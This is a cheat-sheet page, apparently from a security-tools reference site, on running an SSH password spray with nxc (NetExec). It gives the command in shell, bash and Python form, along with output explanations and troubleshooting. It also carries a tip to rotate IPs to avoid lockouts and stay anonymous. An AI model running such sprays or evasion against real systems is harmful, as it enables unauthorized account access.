Spray Password Against Usernames

Conduct a password spray attack across multiple usernames on SSH service.

Terminal

nxc ssh <192.168.178.2> -u <path/to/usernames.txt> -p <password>

nxc ssh <192.168.178.2> -u <path/to/usernames.txt> -p <password>

#!/bin/bash

# Spray Password Against Usernames
nxc ssh {{192.168.178.2}} {{[-u|--username]}} {{path/to/usernames.txt}} {{[-p|--password]}} {{password}}

import subprocess

# Spray Password Against Usernames
# Make sure to replace <placeholders> with actual values
def run_command():
    cmd = [
        "nxc",
        "ssh",
        "<192.168.178.2>",
        "-u",
        "<path/to/usernames.txt>",
        "-p",
        "<password>"
    ]
    
    try:
        print(f"Executing: {' '.join(cmd)}")
        subprocess.run(cmd, check=True)
    except subprocess.CalledProcessError as e:
        print(f"Error: {e}")
    except FileNotFoundError:
        print("Error: nxc not found. Please install it first.")

if __name__ == "__main__":
    run_command()

When To Use

During an assessment of SSH service security and strength against brute-force exploits.

Pro Tip

Implement IP rotation during attacks to minimize lockout conditions and increase anonymity.

Command Builder

Tune the command before you copy it

Back to syntax

Generated Command

nxc ssh <192.168.178.2> -u <path/to/usernames.txt> -p <password>

Anatomy of Output

Understanding the result

Attempting login for user 'admin'... Login Attempt Notice

The username is being validated against the SSH service.

Password granted for 'alice'. Success Confirmation

Indicates successful login with the guessed password.

Access denied for user 'guest'. Failure Notice

Informs of failed authentication for the given username.

Troubleshooting

Common pitfalls

Permission denied, please try again.

Solution: Verify the correctness of the username and password combinations.

Connection refused: SSH server not active.

Solution: Check that the SSH service is running on the target machine.

Connection timed out.

Solution: Ensure the server’s IP is reachable and responsive.

Command Breakdown

What each part is doing

nxc: Base Command; The executable that performs this operation. Here it runs Nxc before the shell applies any redirect operators.
<192.168.178.2>: 192.168.178.2; The value supplied for 192.168.178.2.
-u: u| username; The user value supplied to this command.
<path/to/usernames.txt>: path to usernames.txt; The user value supplied to this command.
-p: p| password; The value supplied for p| password.
<password>: password; The value supplied for password.
-u: Command Option; Tool-specific option used by this command invocation.
-p: Command Option; Tool-specific option used by this command invocation.

Alternative Approaches

Comparable commands in other tools

Alternative security tools for the same job.

Nettacker / Run Ping Test And Multiple Scans On Target nettacker --ping-before-scan -m <port_scan,subdomain_scan,waf_scan,...> -g <80,443> -i <owasp.org> Gpg / Display Help In Gpg Tui <?> Freshclam / Update Virus Definitions Clamav freshclam Secret Tool / Retrieve Password secret-tool lookup key <key> John / Show Passwords Cracked john --show <path/to/hashes.txt>